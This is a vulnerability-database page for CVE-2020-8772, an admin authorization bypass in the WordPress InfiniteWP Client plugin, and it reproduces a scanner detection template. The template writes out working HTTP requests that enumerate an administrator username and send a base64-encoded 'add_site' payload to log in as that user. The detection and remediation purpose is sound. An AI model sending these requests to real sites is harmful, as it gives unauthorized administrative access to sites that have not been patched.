Vulners
Lucene search
WordPress InfiniteWP <1.9.4.5 - Authorization Bypass
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2020-8772 | 10 Feb 202011:42 | – | circl |
 | CVE-2020-8772 | 6 Feb 202016:27 | – | cve |
 | CVE-2020-8772 | 6 Feb 202016:27 | – | cvelist |
 | CVE-2020-8772 | 6 Feb 202017:15 | – | nvd |
 | WordPress InfiniteWP Client Plugin < 1.9.4.5 Authentication Bypass Vulnerability | 22 Aug 202300:00 | – | openvas |
 | CVE-2020-8772 | 6 Feb 202017:15 | – | osv |
 | Authorization | 6 Feb 202017:15 | – | prion |
 | PT-2020-20264 | 6 Feb 202000:00 | – | ptsecurity |
 | CVE-2020-8772 | 22 May 202516:52 | – | redhatcve |
 | InfiniteWP Client < 1.9.4.5 - Authentication Bypass | 14 Jan 202000:00 | – | wpexploit |
10
id: CVE-2020-8772
info:
name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass
author: princechaddha,scent2d
severity: critical
description: |
WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can gain unauthorized administrative access to the WordPress site.
remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.
reference:
- https://wpscan.com/vulnerability/10011
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
- https://wpvulndb.com/vulnerabilities/10011
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
- https://github.com/ChoiSG/vwp
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-8772
cwe-id: CWE-862
epss-score: 0.8787
epss-percentile: 0.99741
cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: revmakx
product: infinitewp_client
framework: wordpress
tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx,vuln
http:
- raw:
- |
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
_IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}}
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "wordpress_logged_in"
- type: word
part: body
words:
- "<IWPHEADER>"
- type: status
status:
- 200
extractors:
- type: regex
name: username
group: 1
regex:
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
internal: true
part: body
- type: regex
name: username
group: 1
regex:
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
internal: true
part: header
# digest: 4a0a00473045022100c428f2da5f9f72f8d4434a7dbc347d7f753a9d3e7b26864e91a062f9178e899e02205499f26fce40b51ded6927316eb86b8c53f360452eae28e74b1a2ae7fca7904e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.5High risk
Vulners AI Score8.5
CVSS 27.5
CVSS 3.19.8
EPSS0.8787